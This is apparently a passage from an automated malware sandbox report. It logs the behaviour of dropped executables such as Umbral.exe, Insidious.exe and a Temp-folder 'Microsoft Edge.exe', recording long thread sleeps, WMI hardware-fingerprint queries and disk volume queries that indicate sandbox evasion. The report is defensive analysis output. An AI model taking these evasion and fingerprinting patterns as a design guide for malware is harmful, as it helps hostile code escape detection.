                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -598703s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -598453s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -598150s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -598030s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597918s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597773s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597652s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597546s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597437s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597325s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597218s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -597104s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -596988s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -596861s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -596734s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -596624s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7064 Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 6500 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 764 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 5148 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -25825441703193356s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -599079s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598930s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598766s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598599s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598352s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598230s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -598122s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597987s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597868s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597747s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597596s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597343s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597229s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -597110s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596983s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596872s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596756s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596594s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596375s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596183s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -596031s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -595874s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -595605s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -595447s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -595226s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -595100s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594958s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594782s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594641s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594487s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594358s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -594094s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593981s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593869s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593765s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593648s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593527s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593375s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593227s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -593090s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -592891s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -592735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -592532s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -592360s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -592204s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -592047s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -591907s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -591750s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -591621s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -591475s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -591356s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -591125s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590903s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590795s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590688s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590563s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590449s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590325s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -590188s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -589985s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -589860s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -589735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -589610s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176 Thread sleep time: -589469s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589340s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589125s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -589007s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588891s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588766s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588641s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588492s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588391s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588266s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -588147s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587969s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587735s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587532s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587396s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587261s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587151s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -587044s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586912s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586782s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586645s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586527s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586422s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7176Thread sleep time: -586309s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7468Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7860Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 6566 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 596 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 8100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 8140Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 7316Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 599619
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 599501
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 599377
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 599075
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 598150
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 598030
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597918
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597773
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597652
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597325
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 597104
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 596988
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 596861
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 599079
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598930
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598599
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598352
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598230
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 598122
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597987
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597868
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597747
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597596
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597343
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597229
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596983
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596872
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596756
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596183
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 595874
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 595605
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 595447
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 595226
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 595100
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594958
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594782
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594641
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594487
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594358
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594232
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 594094
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593981
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593869
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593765
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593648
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593527
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593375
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593227
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 593090
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 592891
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 592735
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 592532
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 592360
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 592204
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 592047
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 591907
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 591750
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 591621
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 591475
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 591356
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 591125
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590903
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590795
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590688
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590563
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590449
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590325
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 590188
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589985
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589860
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589735
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589610
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589469
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589340
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589232
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589125
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 589007
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588891
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588766
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588641
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588492
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588391
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588266
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 588147
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587969
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587735
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587532
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587396
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587261
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587151
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 587044
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 586912
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 586782
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 586645
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 586527
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 586422
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 586309
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Thread delayed: delay time: 922337203685477
